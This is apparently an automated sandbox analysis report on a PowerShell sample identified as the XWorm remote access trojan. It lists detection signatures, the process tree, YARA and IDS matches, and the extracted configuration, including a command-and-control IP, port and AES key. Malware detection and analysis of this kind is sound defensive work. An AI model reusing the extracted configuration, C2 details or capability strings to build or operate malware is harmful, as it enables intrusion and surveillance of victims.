Edit tour

Windows Analysis Report
rZqmN4mRco.ps1

Overview

General Information

Sample name:rZqmN4mRco.ps1
renamed because original name is a hash value
Original sample name:802c0cc4f3d35ffedec258400ce9f0c4b2d884db30a974e0fd6b72ffdff73fed.ps1
Analysis ID:1601199
MD5:c243c751841d3cce8b6d14ecd48703b7
SHA1:145913260586b946f0e858635c6255b073531b71
SHA256:802c0cc4f3d35ffedec258400ce9f0c4b2d884db30a974e0fd6b72ffdff73fed
Tags:176-113-115-225bookingps1user-JAMESWT_MHT
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Potentially Suspicious Malware Callback Communication
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64
  • powershell.exe (PID: 7728 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\rZqmN4mRco.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 7948 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup
{
  "C2 url": [
    "176.113.115.225"
  ],
  "Port": 4444,
  "Aes key": "P0WER",
  "SPL": "<Xwormmm>",
  "Install file": "USB.exe"
}
SourceRuleDescriptionAuthorStrings
00000001.00000002.1441536967.0000019B0AADA000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
    00000001.00000002.1441536967.0000019B0AADA000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
    • 0xd038:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0xd0d5:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0xd1ea:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0xccaa:$cnc4: POST / HTTP/1.1
    00000003.00000002.3880126315.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
      00000003.00000002.3880126315.0000000000402000.00000040.00000400.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0xb938:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0xb9d5:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0xbaea:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0xb5aa:$cnc4: POST / HTTP/1.1
      00000003.00000002.3883270268.0000000003051000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
        Click to see the 6 entries
        SourceRuleDescriptionAuthorStrings
        1.2.powershell.exe.19b0aa80e98.2.unpackJoeSecurity_XWormYara detected XWormJoe Security
          1.2.powershell.exe.19b0aa80e98.2.unpackrat_win_xworm_v3Finds XWorm (version XClient, v3) samples based on characteristic stringsSekoia.io
          • 0x7c92:$str01: $VB$Local_Port
          • 0x7cfe:$str02: $VB$Local_Host
          • 0x65ee:$str03: get_Jpeg
          • 0x6b90:$str04: get_ServicePack
          • 0x89be:$str05: Select * from AntivirusProduct
          • 0x90fc:$str06: PCRestart
          • 0x9110:$str07: shutdown.exe /f /r /t 0
          • 0x91c2:$str08: StopReport
          • 0x9198:$str09: StopDDos
          • 0x928e:$str10: sendPlugin
          • 0x930e:$str11: OfflineKeylogger Not Enabled
          • 0x9466:$str12: -ExecutionPolicy Bypass -File "
          • 0x9a8f:$str13: Content-length: 5235
          1.2.powershell.exe.19b0aa80e98.2.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
          • 0x9d38:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
          • 0x9dd5:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
          • 0x9eea:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
          • 0x99aa:$cnc4: POST / HTTP/1.1
          3.2.RegSvcs.exe.400000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
            3.2.RegSvcs.exe.400000.0.unpackrat_win_xworm_v3Finds XWorm (version XClient, v3) samples based on characteristic stringsSekoia.io
            • 0x9a92:$str01: $VB$Local_Port
            • 0x9afe:$str02: $VB$Local_Host
            • 0x83ee:$str03: get_Jpeg
            • 0x8990:$str04: get_ServicePack
            • 0xa7be:$str05: Select * from AntivirusProduct
            • 0xaefc:$str06: PCRestart
            • 0xaf10:$str07: shutdown.exe /f /r /t 0
            • 0xafc2:$str08: StopReport
            • 0xaf98:$str09: StopDDos
            • 0xb08e:$str10: sendPlugin
            • 0xb10e:$str11: OfflineKeylogger Not Enabled
            • 0xb266:$str12: -ExecutionPolicy Bypass -File "
            • 0xb88f:$str13: Content-length: 5235
            Click to see the 10 entries

            System Summary

            barindex
            Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 176.113.115.225, DestinationIsIpv6: false, DestinationPort: 4444, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Initiated: true, ProcessId: 7948, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49705
            Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\rZqmN4mRco.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\rZqmN4mRco.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\rZqmN4mRco.ps1", ProcessId: 7728, ProcessName: powershell.exe
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\rZqmN4mRco.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\rZqmN4mRco.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\rZqmN4mRco.ps1", ProcessId: 7728, ProcessName: powershell.exe
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-28T12:23:27.023169+010028528701Malware Command and Control Activity Detected176.113.115.2254444192.168.2.849705TCP
            2025-01-28T12:23:35.884149+010028528701Malware Command and Control Activity Detected176.113.115.2254444192.168.2.849705TCP
            2025-01-28T12:23:39.893947+010028528701Malware Command and Control Activity Detected176.113.115.2254444192.168.2.849705TCP
            2025-01-28T12:23:52.769091+010028528701Malware Command and Control Activity Detected176.113.115.2254444192.168.2.849705TCP
            2025-01-28T12:24:05.664555+010028528701Malware Command and Control Activity Detected176.113.115.2254444192.168.2.849705TCP
            2025-01-28T12:24:05.886218+010028528701Malware Command and Control Activity Detected176.113.115.2254444192.168.2.849705TCP
            2025-01-28T12:24:18.527432+010028528701Malware Command and Control Activity Detected176.113.115.2254444192.168.2.849705TCP
            2025-01-28T12:24:21.628137+010028528701Malware Command and Control Activity Detected176.113.115.2254444192.168.2.849705TCP
            2025-01-28T12:24:21.750649+010028528701Malware Command and Control Activity Detected176.113.115.2254444192.168.2.849705TCP
            2025-01-28T12:24:26.972360+010028528701Malware Command and Control Activity Detected176.113.115.2254444192.168.2.849705TCP
            2025-01-28T12:24:27.373556+010028528701Malware Command and Control Activity Detected176.113.115.2254444192.168.2.849705TCP
            2025-01-28T12:24:27.494814+010028528701Malware Command and Control Activity Detected176.113.115.2254444192.168.2.849705TCP
            2025-01-28T12:24:27.615955+010028528701Malware Command and Control Activity Detected176.113.115.2254444192.168.2.849705TCP
            2025-01-28T12:24:35.882836+010028528701Malware Command and Control Activity Detected176.113.115.2254444192.168.2.849705TCP
            2025-01-28T12:24:37.643539+010028528701Malware Command and Control Activity Detected176.113.115.2254444192.168.2.849705TCP
            2025-01-28T12:24:37.765523+010028528701Malware Command and Control Activity Detected176.113.115.2254444192.168.2.849705TCP
            2025-01-28T12:24:37.909469+010028528701Malware Command and Control Activity Detected176.113.115.2254444192.168.2.849705TCP
            2025-01-28T12:24:42.925238+010028528701Malware Command and Control Activity Detected176.113.115.2254444192.168.2.849705TCP
            2025-01-28T12:24:43.047982+010028528701Malware Command and Control Activity Detected176.113.115.2254444192.168.2.849705TCP
            2025-01-28T12:24:53.035067+010028528701Malware Command and Control Activity Detected176.113.115.2254444192.168.2.849705TCP
            2025-01-28T12:24:53.157468+010028528701Malware Command and Control Activity Detected176.113.115.2254444192.168.2.849705TCP
            2025-01-28T12:24:53.562775+010028528701Malware Command and Control Activity Detected176.113.115.2254444192.168.2.849705TCP
            2025-01-28T12:24:53.738401+010028528701Malware Command and Control Activity Detected176.113.115.2254444192.168.2.849705TCP
            2025-01-28T12:25:03.414632+010028528701Malware Command and Control Activity Detected176.113.115.2254444192.168.2.849705TCP
            2025-01-28T12:25:03.422945+010028528701Malware Command and Control Activity Detected176.113.115.2254444192.168.2.849705TCP
            2025-01-28T12:25:05.899412+010028528701Malware Command and Control Activity Detected176.113.115.2254444192.168.2.849705TCP
            2025-01-28T12:25:10.488112+010028528701Malware Command and Control Activity Detected176.113.115.2254444192.168.2.849705TCP
            2025-01-28T12:25:13.511614+010028528701Malware Command and Control Activity Detected176.113.115.2254444192.168.2.849705TCP
            2025-01-28T12:25:14.415618+010028528701Malware Command and Control Activity Detected176.113.115.2254444192.168.2.849705TCP
            2025-01-28T12:25:27.367080+010028528701Malware Command and Control Activity Detected176.113.115.2254444192.168.2.849705TCP
            2025-01-28T12:25:34.379297+010028528701Malware Command and Control Activity Detected176.113.115.2254444192.168.2.849705TCP
            2025-01-28T12:25:35.909409+010028528701Malware Command and Control Activity Detected176.113.115.2254444192.168.2.849705TCP
            2025-01-28T12:25:41.599608+010028528701Malware Command and Control Activity Detected176.113.115.2254444192.168.2.849705TCP
            2025-01-28T12:25:43.064967+010028528701Malware Command and Control Activity Detected176.113.115.2254444192.168.2.849705TCP
            2025-01-28T12:25:45.661132+010028528701Malware Command and Control Activity Detected176.113.115.2254444192.168.2.849705TCP
            2025-01-28T12:25:58.523391+010028528701Malware Command and Control Activity Detected176.113.115.2254444192.168.2.849705TCP
            2025-01-28T12:26:01.175747+010028528701Malware Command and Control Activity Detected176.113.115.2254444192.168.2.849705TCP
            2025-01-28T12:26:02.217210+010028528701Malware Command and Control Activity Detected176.113.115.2254444192.168.2.849705TCP
            2025-01-28T12:26:02.217544+010028528701Malware Command and Control Activity Detected176.113.115.2254444192.168.2.849705TCP
            2025-01-28T12:26:02.217814+010028528701Malware Command and Control Activity Detected176.113.115.2254444192.168.2.849705TCP
            2025-01-28T12:26:02.431071+010028528701Malware Command and Control Activity Detected176.113.115.2254444192.168.2.849705TCP
            2025-01-28T12:26:05.920555+010028528701Malware Command and Control Activity Detected176.113.115.2254444192.168.2.849705TCP
            2025-01-28T12:26:12.409871+010028528701Malware Command and Control Activity Detected176.113.115.2254444192.168.2.849705TCP
            2025-01-28T12:26:13.238106+010028528701Malware Command and Control Activity Detected176.113.115.2254444192.168.2.849705TCP
            2025-01-28T12:26:18.066460+010028528701Malware Command and Control Activity Detected176.113.115.2254444192.168.2.849705TCP
            2025-01-28T12:26:25.113128+010028528701Malware Command and Control Activity Detected176.113.115.2254444192.168.2.849705TCP
            2025-01-28T12:26:27.815842+010028528701Malware Command and Control Activity Detected176.113.115.2254444192.168.2.849705TCP
            2025-01-28T12:26:27.988143+010028528701Malware Command and Control Activity Detected176.113.115.2254444192.168.2.849705TCP
            2025-01-28T12:26:28.110626+010028528701Malware Command and Control Activity Detected176.113.115.2254444192.168.2.849705TCP
            2025-01-28T12:26:28.408775+010028528701Malware Command and Control Activity Detected176.113.115.2254444192.168.2.849705TCP
            2025-01-28T12:26:28.676942+010028528701Malware Command and Control Activity Detected176.113.115.2254444192.168.2.849705TCP
            2025-01-28T12:26:29.097432+010028528701Malware Command and Control Activity Detected176.113.115.2254444192.168.2.849705TCP
            2025-01-28T12:26:31.488902+010028528701Malware Command and Control Activity Detected176.113.115.2254444192.168.2.849705TCP
            2025-01-28T12:26:34.035130+010028528701Malware Command and Control Activity Detected176.113.115.2254444192.168.2.849705TCP
            2025-01-28T12:26:35.928828+010028528701Malware Command and Control Activity Detected176.113.115.2254444192.168.2.849705TCP
            2025-01-28T12:26:38.413379+010028528701Malware Command and Control Activity Detected176.113.115.2254444192.168.2.849705TCP
            2025-01-28T12:26:39.128239+010028528701Malware Command and Control Activity Detected176.113.115.2254444192.168.2.849705TCP
            2025-01-28T12:26:39.335986+010028528701Malware Command and Control Activity Detected176.113.115.2254444192.168.2.849705TCP
            2025-01-28T12:26:40.317484+010028528701Malware Command and Control Activity Detected176.113.115.2254444192.168.2.849705TCP
            2025-01-28T12:26:49.521752+010028528701Malware Command and Control Activity Detected176.113.115.2254444192.168.2.849705TCP
            2025-01-28T12:26:49.642322+010028528701Malware Command and Control Activity Detected176.113.115.2254444192.168.2.849705TCP
            2025-01-28T12:26:49.765402+010028528701Malware Command and Control Activity Detected176.113.115.2254444192.168.2.849705TCP
            2025-01-28T12:26:49.884171+010028528701Malware Command and Control Activity Detected176.113.115.2254444192.168.2.849705TCP
            2025-01-28T12:26:50.340712+010028528701Malware Command and Control Activity Detected176.113.115.2254444192.168.2.849705TCP
            2025-01-28T12:26:55.301255+010028528701Malware Command and Control Activity Detected176.113.115.2254444192.168.2.849705TCP
            2025-01-28T12:26:55.684756+010028528701Malware Command and Control Activity Detected176.113.115.2254444192.168.2.849705TCP
            2025-01-28T12:27:01.425651+010028528701Malware Command and Control Activity Detected176.113.115.2254444192.168.2.849705TCP
            2025-01-28T12:27:05.948767+010028528701Malware Command and Control Activity Detected176.113.115.2254444192.168.2.849705TCP
            2025-01-28T12:27:06.769231+010028528701Malware Command and Control Activity Detected176.113.115.2254444192.168.2.849705TCP
            2025-01-28T12:27:06.891752+010028528701Malware Command and Control Activity Detected176.113.115.2254444192.168.2.849705TCP
            2025-01-28T12:27:14.425804+010028528701Malware Command and Control Activity Detected176.113.115.2254444192.168.2.849705TCP
            2025-01-28T12:27:15.926110+010028528701Malware Command and Control Activity Detected176.113.115.2254444192.168.2.849705TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-28T12:23:27.307565+010028529231Malware Command and Control Activity Detected192.168.2.849705176.113.115.2254444TCP
            2025-01-28T12:23:39.909678+010028529231Malware Command and Control Activity Detected192.168.2.849705176.113.115.2254444TCP
            2025-01-28T12:23:52.773427+010028529231Malware Command and Control Activity Detected192.168.2.849705176.113.115.2254444TCP
            2025-01-28T12:24:05.666581+010028529231Malware Command and Control Activity Detected192.168.2.849705176.113.115.2254444TCP
            2025-01-28T12:24:18.529867+010028529231Malware Command and Control Activity Detected192.168.2.849705176.113.115.2254444TCP
            2025-01-28T12:24:21.634672+010028529231Malware Command and Control Activity Detected192.168.2.849705176.113.115.2254444TCP
            2025-01-28T12:24:21.758652+010028529231Malware Command and Control Activity Detected192.168.2.849705176.113.115.2254444TCP
            2025-01-28T12:24:26.976678+010028529231Malware Command and Control Activity Detected192.168.2.849705176.113.115.2254444TCP
            2025-01-28T12:24:27.375983+010028529231Malware Command and Control Activity Detected192.168.2.849705176.113.115.2254444TCP
            2025-01-28T12:24:27.497081+010028529231Malware Command and Control Activity Detected192.168.2.849705176.113.115.2254444TCP
            2025-01-28T12:24:27.619295+010028529231Malware Command and Control Activity Detected192.168.2.849705176.113.115.2254444TCP
            2025-01-28T12:24:37.648693+010028529231Malware Command and Control Activity Detected192.168.2.849705176.113.115.2254444TCP
            2025-01-28T12:24:37.767213+010028529231Malware Command and Control Activity Detected192.168.2.849705176.113.115.2254444TCP
            2025-01-28T12:24:37.911386+010028529231Malware Command and Control Activity Detected192.168.2.849705176.113.115.2254444TCP
            2025-01-28T12:24:42.927266+010028529231Malware Command and Control Activity Detected192.168.2.849705176.113.115.2254444TCP
            2025-01-28T12:24:43.050094+010028529231Malware Command and Control Activity Detected192.168.2.849705176.113.115.2254444TCP
            2025-01-28T12:24:53.040631+010028529231Malware Command and Control Activity Detected192.168.2.849705176.113.115.2254444TCP
            2025-01-28T12:24:53.159267+010028529231Malware Command and Control Activity Detected192.168.2.849705176.113.115.2254444TCP
            2025-01-28T12:24:53.584201+010028529231Malware Command and Control Activity Detected192.168.2.849705176.113.115.2254444TCP
            2025-01-28T12:24:53.897168+010028529231Malware Command and Control Activity Detected192.168.2.849705176.113.115.2254444TCP
            2025-01-28T12:25:03.416900+010028529231Malware Command and Control Activity Detected192.168.2.849705176.113.115.2254444TCP
            2025-01-28T12:25:03.424967+010028529231Malware Command and Control Activity Detected192.168.2.849705176.113.115.2254444TCP
            2025-01-28T12:25:10.516865+010028529231Malware Command and Control Activity Detected192.168.2.849705176.113.115.2254444TCP
            2025-01-28T12:25:13.513922+010028529231Malware Command and Control Activity Detected192.168.2.849705176.113.115.2254444TCP
            2025-01-28T12:25:14.418720+010028529231Malware Command and Control Activity Detected192.168.2.849705176.113.115.2254444TCP
            2025-01-28T12:25:27.369454+010028529231Malware Command and Control Activity Detected192.168.2.849705176.113.115.2254444TCP
            2025-01-28T12:25:34.383872+010028529231Malware Command and Control Activity Detected192.168.2.849705176.113.115.2254444TCP
            2025-01-28T12:25:41.602344+010028529231Malware Command and Control Activity Detected192.168.2.849705176.113.115.2254444TCP
            2025-01-28T12:25:43.067711+010028529231Malware Command and Control Activity Detected192.168.2.849705176.113.115.2254444TCP
            2025-01-28T12:25:45.663000+010028529231Malware Command and Control Activity Detected192.168.2.849705176.113.115.2254444TCP
            2025-01-28T12:25:58.525437+010028529231Malware Command and Control Activity Detected192.168.2.849705176.113.115.2254444TCP
            2025-01-28T12:26:01.177247+010028529231Malware Command and Control Activity Detected192.168.2.849705176.113.115.2254444TCP
            2025-01-28T12:26:02.219550+010028529231Malware Command and Control Activity Detected192.168.2.849705176.113.115.2254444TCP
            2025-01-28T12:26:02.433315+010028529231Malware Command and Control Activity Detected192.168.2.849705176.113.115.2254444TCP
            2025-01-28T12:26:12.412310+010028529231Malware Command and Control Activity Detected192.168.2.849705176.113.115.2254444TCP
            2025-01-28T12:26:13.239839+010028529231Malware Command and Control Activity Detected192.168.2.849705176.113.115.2254444TCP
            2025-01-28T12:26:18.411580+010028529231Malware Command and Control Activity Detected192.168.2.849705176.113.115.2254444TCP
            2025-01-28T12:26:25.122064+010028529231Malware Command and Control Activity Detected192.168.2.849705176.113.115.2254444TCP
            2025-01-28T12:26:27.819607+010028529231Malware Command and Control Activity Detected192.168.2.849705176.113.115.2254444TCP
            2025-01-28T12:26:27.991592+010028529231Malware Command and Control Activity Detected192.168.2.849705176.113.115.2254444TCP
            2025-01-28T12:26:28.112229+010028529231Malware Command and Control Activity Detected192.168.2.849705176.113.115.2254444TCP
            2025-01-28T12:26:28.411007+010028529231Malware Command and Control Activity Detected192.168.2.849705176.113.115.2254444TCP
            2025-01-28T12:26:28.682056+010028529231Malware Command and Control Activity Detected192.168.2.849705176.113.115.2254444TCP
            2025-01-28T12:26:29.099404+010028529231Malware Command and Control Activity Detected192.168.2.849705176.113.115.2254444TCP
            2025-01-28T12:26:31.490696+010028529231Malware Command and Control Activity Detected192.168.2.849705176.113.115.2254444TCP
            2025-01-28T12:26:34.039595+010028529231Malware Command and Control Activity Detected192.168.2.849705176.113.115.2254444TCP
            2025-01-28T12:26:38.414881+010028529231Malware Command and Control Activity Detected192.168.2.849705176.113.115.2254444TCP
            2025-01-28T12:26:39.135435+010028529231Malware Command and Control Activity Detected192.168.2.849705176.113.115.2254444TCP
            2025-01-28T12:26:39.339163+010028529231Malware Command and Control Activity Detected192.168.2.849705176.113.115.2254444TCP
            2025-01-28T12:26:40.319218+010028529231Malware Command and Control Activity Detected192.168.2.849705176.113.115.2254444TCP
            2025-01-28T12:26:49.523712+010028529231Malware Command and Control Activity Detected192.168.2.849705176.113.115.2254444TCP
            2025-01-28T12:26:49.648494+010028529231Malware Command and Control Activity Detected192.168.2.849705176.113.115.2254444TCP
            2025-01-28T12:26:49.767663+010028529231Malware Command and Control Activity Detected192.168.2.849705176.113.115.2254444TCP
            2025-01-28T12:26:49.887455+010028529231Malware Command and Control Activity Detected192.168.2.849705176.113.115.2254444TCP
            2025-01-28T12:26:50.343534+010028529231Malware Command and Control Activity Detected192.168.2.849705176.113.115.2254444TCP
            2025-01-28T12:26:55.303233+010028529231Malware Command and Control Activity Detected192.168.2.849705176.113.115.2254444TCP
            2025-01-28T12:26:55.686427+010028529231Malware Command and Control Activity Detected192.168.2.849705176.113.115.2254444TCP
            2025-01-28T12:27:01.427397+010028529231Malware Command and Control Activity Detected192.168.2.849705176.113.115.2254444TCP
            2025-01-28T12:27:06.770870+010028529231Malware Command and Control Activity Detected192.168.2.849705176.113.115.2254444TCP
            2025-01-28T12:27:06.894142+010028529231Malware Command and Control Activity Detected192.168.2.849705176.113.115.2254444TCP
            2025-01-28T12:27:14.427797+010028529231Malware Command and Control Activity Detected192.168.2.849705176.113.115.2254444TCP
            2025-01-28T12:27:15.927184+010028529231Malware Command and Control Activity Detected192.168.2.849705176.113.115.2254444TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-28T12:23:35.884149+010028588011Malware Command and Control Activity Detected176.113.115.2254444192.168.2.849705TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-28T12:25:27.070180+010028587991Malware Command and Control Activity Detected192.168.2.849705176.113.115.2254444TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: 1.2.powershell.exe.19b0b8a2fd0.4.unpackMalware Configuration Extractor: Xworm {"C2 url": ["176.113.115.225"], "Port": 4444, "Aes key": "P0WER", "SPL": "<Xwormmm>", "Install file": "USB.exe"}
            Source: rZqmN4mRco.ps1Virustotal: Detection: 31%Perma Link
            Source: rZqmN4mRco.ps1ReversingLabs: Detection: 23%
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: 1.2.powershell.exe.19b0b8a2fd0.4.unpackString decryptor: 176.113.115.225
            Source: 1.2.powershell.exe.19b0b8a2fd0.4.unpackString decryptor: 4444
            Source: 1.2.powershell.exe.19b0b8a2fd0.4.unpackString decryptor: P0WER
            Source: 1.2.powershell.exe.19b0b8a2fd0.4.unpackString decryptor: <Xwormmm>
            Source: 1.2.powershell.exe.19b0b8a2fd0.4.unpackString decryptor: XWorm
            Source: 1.2.powershell.exe.19b0b8a2fd0.4.unpackString decryptor: USB.exe
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior

            Networking

            barindex
            Source: Network trafficSuricata IDS: 2858800 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.8:49705 -> 176.113.115.225:4444
            Source: Network trafficSuricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 176.113.115.225:4444 -> 192.168.2.8:49705
            Source: Network trafficSuricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.8:49705 -> 176.113.115.225:4444
            Source: Network trafficSuricata IDS: 2858801 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Command - Ping Inbound : 176.113.115.225:4444 -> 192.168.2.8:49705
            Source: Network trafficSuricata IDS: 2858799 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.8:49705 -> 176.113.115.225:4444
            Source: Malware configuration extractorURLs: 176.113.115.225
            Source: global trafficTCP traffic: 192.168.2.8:49705 -> 176.113.115.225:4444
            Source: Joe Sandbox ViewASN Name: SELECTELRU SELECTELRU
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.225
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.225
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.225
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.225
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.225
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.225
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.225
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.225
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.225
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.225
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.225
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.225
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.225
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.225
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.225
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.225
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.225
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.225
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.225
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.225
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.225
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.225
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.225
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.225
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.225
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.225
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.225
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.225
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.225
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.225
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.225
